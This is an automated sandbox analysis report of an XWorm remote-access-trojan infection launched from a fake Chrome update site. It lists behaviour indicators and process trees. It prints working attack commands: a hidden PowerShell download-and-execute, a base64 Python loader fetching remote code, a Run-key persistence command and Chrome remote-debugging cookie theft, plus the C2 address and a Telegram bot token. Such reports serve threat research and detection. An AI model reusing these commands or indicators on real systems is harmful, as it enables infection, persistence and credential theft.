xworm | hxxp://chromeupdates[.]com

Analysis

max time kernel
418s
max time network
534s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-11-2024 13:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://chromeupdates.com

Score

10^/10

xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

103.176.110.245:25902

Mutex

gJ18Xu5U9mSdXqIs

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7276041743:AAHcuQBIgMQxThnw-SMW4PSn0GYAkSjroxA

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4372-4072-0x0000000005610000-0x0000000005620000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
81	3496	PowerShell.exe
83	5012	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3496	PowerShell.exe
3496	PowerShell.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2024	chrome.exe
1472	chrome.exe
3172	msedge.exe
3076	msedge.exe
2116	msedge.exe
1772	chrome.exe
4340	chrome.exe
2492	msedge.exe
392	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
4372	synaptics.exe

Loads dropped DLL 42 IoCs

pid	Process
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe
4372	synaptics.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Windows\\Explorer.EXE C:\\Users\\Admin\\AppData\\Local\\WindowsSecurity.lnk"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
86	raw.githubusercontent.com
87	raw.githubusercontent.com
121	raw.githubusercontent.com
123	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
116	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2356	taskkill.exe
2780	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133758068946639879"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2045521122-590294423-3465680274-1000\{A77F00EC-BF3D-4783-A39C-A58390CBFEBA}	msedge.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
3496	PowerShell.exe
3496	PowerShell.exe
3496	PowerShell.exe
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
4012	chrome.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
3536	powershell.exe
3536	powershell.exe
3536	powershell.exe
4012	powershell.exe
4012	powershell.exe
4012	powershell.exe
2024	chrome.exe
2024	chrome.exe
1860	msedge.exe
1860	msedge.exe
3624	msedge.exe
3624	msedge.exe
4148	msedge.exe
4148	msedge.exe
3172	msedge.exe
3172	msedge.exe
3076	msedge.exe
3076	msedge.exe
2116	msedge.exe
2116	msedge.exe
392	msedge.exe
392	msedge.exe
2492	msedge.exe
2492	msedge.exe
4372	synaptics.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
2024	chrome.exe
2024	chrome.exe
3172	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4372	synaptics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1224 wrote to memory of 1152	1224	chrome.exe	85
PID 1224 wrote to memory of 1152	1224	chrome.exe	85
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 2532	1224	chrome.exe	86
PID 1224 wrote to memory of 3652	1224	chrome.exe	87
PID 1224 wrote to memory of 3652	1224	chrome.exe	87
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88
PID 1224 wrote to memory of 2328	1224	chrome.exe	88

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://chromeupdates.com
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffaf3dbcc40,0x7ffaf3dbcc4c,0x7ffaf3dbcc58
  2⤵
  PID:1152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1588,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1580 /prefetch:2
  2⤵
  PID:2532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2148 /prefetch:3
  2⤵
  PID:3652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2408 /prefetch:8
  2⤵
  PID:2328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3020,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3052 /prefetch:1
  2⤵
  PID:4212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3032,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4840,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
  2⤵
  PID:2908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4448,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5020 /prefetch:8
  2⤵
  PID:3452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3244,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5260,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5448 /prefetch:8
  2⤵
  PID:2972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4724,i,11118298992198924897,5227164632801053308,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4012

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1332

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x41c 0x4b8
1⤵
PID:4536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1836

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'https://klingdow.com/1.bat' -OutFile $env:TEMP\file.bat; Start-Process $env:TEMP\file.bat -WindowStyle Hidden} #Authentication Is Not a Robot Press Enter to confirm
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\file.bat" "
  2⤵
  PID:1440
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2984
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\file.bat"" ::",0)(window.close)
    3⤵
    - Checks computer location settings
    PID:1180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\file.bat" ::"
      4⤵
      PID:4980
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://boostcreatives-ai.com/synaptics.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') "
        5⤵
        
        PID:1060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:5012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'xFSOj9El1Q'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'xFSOj9El1Q.zip'), $dst) "
        5⤵
        
        PID:3208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1676
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS92aWV0bmFtcGx1ZzIyMS9BQy9yZWZzL2hlYWRzL21haW4vU1RTX0VOQycpLnJlYWQoKS5kZWNvZGUoJ3V0Zi04JykpKQ==')) ";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
        5⤵
        
        PID:3784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3536
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\WindowsSecurity.lnk' -Force "
        5⤵
        
        PID:1440
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:4012
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c start "" "C:\Users\Admin\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS92aWV0bmFtcGx1ZzIyMS9BQy9yZWZzL2hlYWRzL21haW4vU1RTX0VOQycpLnJlYWQoKS5kZWNvZGUoJ3V0Zi04JykpKQ==')) "
        5⤵
        
        PID:4220
      - C:\Users\Admin\AppData\Local\xFSOj9El1Q\synaptics.exe
        
        "C:\Users\Admin\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS92aWV0bmFtcGx1ZzIyMS9BQy9yZWZzL2hlYWRzL21haW4vU1RTX0VOQycpLnJlYWQoKS5kZWNvZGUoJ3V0Zi04JykpKQ==')) "
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4372
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        7⤵
        Uses browser remote debugging
